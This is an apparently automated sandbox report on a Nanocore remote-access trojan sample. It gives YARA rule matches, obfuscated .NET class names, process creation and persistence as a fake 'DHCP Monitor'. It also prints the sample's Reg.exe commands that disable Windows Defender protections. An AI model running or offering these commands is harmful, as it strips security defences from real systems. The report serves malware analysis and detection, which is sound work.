          Source: 16.2.dhcpmon.exe.446e3ec.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 16.2.dhcpmon.exe.446e3ec.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 2.2.Service.exe.5840000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 2.2.Service.exe.5840000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 2.2.Service.exe.41c95b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 2.2.Service.exe.41c95b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 2.2.Service.exe.41c95b6.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 2.2.Service.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 2.2.Service.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 2.2.Service.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 16.2.dhcpmon.exe.446e3ec.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 16.2.dhcpmon.exe.446e3ec.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: Service.exe.0.drStatic PE information: Section: .rsrc ZLIB complexity 0.999430803571
          Source: dhcpmon.exe.2.drStatic PE information: Section: .rsrc ZLIB complexity 0.999430803571
          Source: Service.exe.0.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: Service.exe.0.dr, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
          Source: Service.exe.0.dr, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
          Source: dhcpmon.exe.2.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: dhcpmon.exe.2.dr, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
          Source: dhcpmon.exe.2.dr, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
          Source: 2.0.Service.exe.900000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
          Source: 2.0.Service.exe.900000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
          Source: 2.0.Service.exe.900000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 16.2.dhcpmon.exe.c60000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 16.2.dhcpmon.exe.c60000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: Service.exe.0.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: Service.exe.0.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 2.0.Service.exe.900000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 2.0.Service.exe.900000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 2.2.Service.exe.900000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 2.2.Service.exe.900000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: dhcpmon.exe.2.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: dhcpmon.exe.2.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 16.0.dhcpmon.exe.c60000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 16.0.dhcpmon.exe.c60000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: classification engineClassification label: mal100.troj.evad.winEXE@24/6@8/2
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_01316E29 GetLastError,FormatMessageW,
          Source: C:\Users\user\Desktop\Service.exeCode function: 2_2_02E010DA AdjustTokenPrivileges,
          Source: C:\Users\user\Desktop\Service.exeCode function: 2_2_02E010A3 AdjustTokenPrivileges,
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_01329F5C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,
          Source: C:\Users\user\Desktop\Service.exeFile created: C:\Program Files (x86)\DHCP MonitorJump to behavior
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeFile created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_6740765Jump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_01
          Source: C:\Users\user\Desktop\Service.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{f0ee6c15-7813-4f2f-a8f4-f86f2a48b89f}
          Source: C:\Users\user\Desktop\Service.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6976:120:WilError_01
          Source: C:\Users\user\Desktop\Main.exeFile created: C:\Users\user\AppData\Local\Temp\DFA1.tmpJump to behavior
          Source: C:\Users\user\Desktop\Main.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\DFA1.tmp\DFA2.tmp\DFA3.bat C:\Users\user\Desktop\Main.exe'
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCommand line argument: sfxname
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCommand line argument: sfxstime
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCommand line argument: STARTDLG
          Source: 01d32b29_by_Libranalysis.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Service.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Service.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Users\user\Desktop\Service.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeFile read: C:\Windows\win.iniJump to behavior
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: 01d32b29_by_Libranalysis.exeVirustotal: Detection: 48%
          Source: 01d32b29_by_Libranalysis.exeReversingLabs: Detection: 55%
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeFile read: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe 'C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe'
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\Main.exe 'C:\Users\user\Desktop\Main.exe'
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\Service.exe 'C:\Users\user\Desktop\Service.exe'
          Source: C:\Users\user\Desktop\Main.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\DFA1.tmp\DFA2.tmp\DFA3.bat C:\Users\user\Desktop\Main.exe'
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe query 'HKU\S-1-5-19\Environment'
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v 'DisableAntiSpyware' /t REG_DWORD /d '1' /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableBehaviorMonitoring' /t REG_DWORD /d '1' /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableOnAccessProtection' /t REG_DWORD /d '1' /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableScanOnRealtimeEnable' /t REG_DWORD /d '1' /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v 'DisableAntiSpyware' /t REG_DWORD /d '1' /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v 'DisableRoutinelyTakingAction' /t REG_DWORD /d '1' /f
          Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
          Source: C:\Windows\System32\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\Main.exe 'C:\Users\user\Desktop\Main.exe'
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\Service.exe 'C:\Users\user\Desktop\Service.exe'
          Source: C:\Users\user\Desktop\Main.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\DFA1.tmp\DFA2.tmp\DFA3.bat C:\Users\user\Desktop\Main.exe'
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe query 'HKU\S-1-5-19\Environment'
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v 'DisableAntiSpyware' /t REG_DWORD /d '1' /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableBehaviorMonitoring' /t REG_DWORD /d '1' /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableOnAccessProtection' /t REG_DWORD /d '1' /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableScanOnRealtimeEnable' /t REG_DWORD /d '1' /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v 'DisableAntiSpyware' /t REG_DWORD /d '1' /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v 'DisableRoutinelyTakingAction' /t REG_DWORD /d '1' /f
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\Service.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
          Source: C:\Users\user\Desktop\Service.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
          Source: 01d32b29_by_Libranalysis.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: 01d32b29_by_Libranalysis.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: 01d32b29_by_Libranalysis.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: 01d32b29_by_Libranalysis.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: 01d32b29_by_Libranalysis.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: 01d32b29_by_Libranalysis.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: 01d32b29_by_Libranalysis.exeStatic PE information: GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: 01d32b29_by_Libranalysis.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 01d32b29_by_Libranalysis.exe
          Source: Binary string: C:\Windows\mscorlib.pdb source: Service.exe, 00000002.00000002.599360238.0000000002E36000.00000004.00000040.sdmp
          Source: Binary string: lib.pdb source: Service.exe, 00000002.00000002.599360238.0000000002E36000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\dll\mscorlib.pdb source: Service.exe, 00000002.00000002.599360238.0000000002E36000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: Service.exe, 00000002.00000002.599360238.0000000002E36000.00000004.00000040.sdmp
          Source: Binary string: mscorrc.pdb source: Service.exe, 00000002.00000002.604812875.00000000055A0000.00000002.00000001.sdmp
          Source: 01d32b29_by_Libranalysis.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: 01d32b29_by_Libranalysis.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: 01d32b29_by_Libranalysis.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: 01d32b29_by_Libranalysis.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: 01d32b29_by_Libranalysis.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: Service.exe.0.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: Service.exe.0.dr, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: dhcpmon.exe.2.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: dhcpmon.exe.2.dr, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.Service.exe.900000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.Service.exe.900000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.2.Service.exe.900000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.2.Service.exe.900000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 16.0.dhcpmon.exe.c60000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 16.0.dhcpmon.exe.c60000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 16.2.dhcpmon.exe.c60000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 16.2.dhcpmon.exe.c60000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\Main.exeCode function: 1_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeFile created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_6740765Jump to behavior
          Source: 01d32b29_by_Libranalysis.exeStatic PE information: section name: .didat
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_0132E3CC push eax; ret
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_0132EEA6 push ecx; ret
          Source: C:\Users\user\Desktop\Main.exeCode function: 1_2_000000014001BD2E push rbx; ret
          Source: C:\Users\user\Desktop\Service.exeCode function: 2_2_00F29D74 push eax; retf
          Source: C:\Users\user\Desktop\Service.exeCode function: 2_2_00F2AA7B push cs; retf
          Source: C:\Users\user\Desktop\Service.exeCode function: 2_2_00F29D78 pushad ; retf
          Source: C:\Users\user\Desktop\Service.exeCode function: 2_2_00F2A993 push cs; retf
          Source: C:\Users\user\Desktop\Service.exeCode function: 2_2_00F2AA07 push cs; retf
          Source: Service.exe.0.dr, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
          Source: Service.exe.0.dr, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
          Source: dhcpmon.exe.2.dr, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
          Source: dhcpmon.exe.2.dr, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
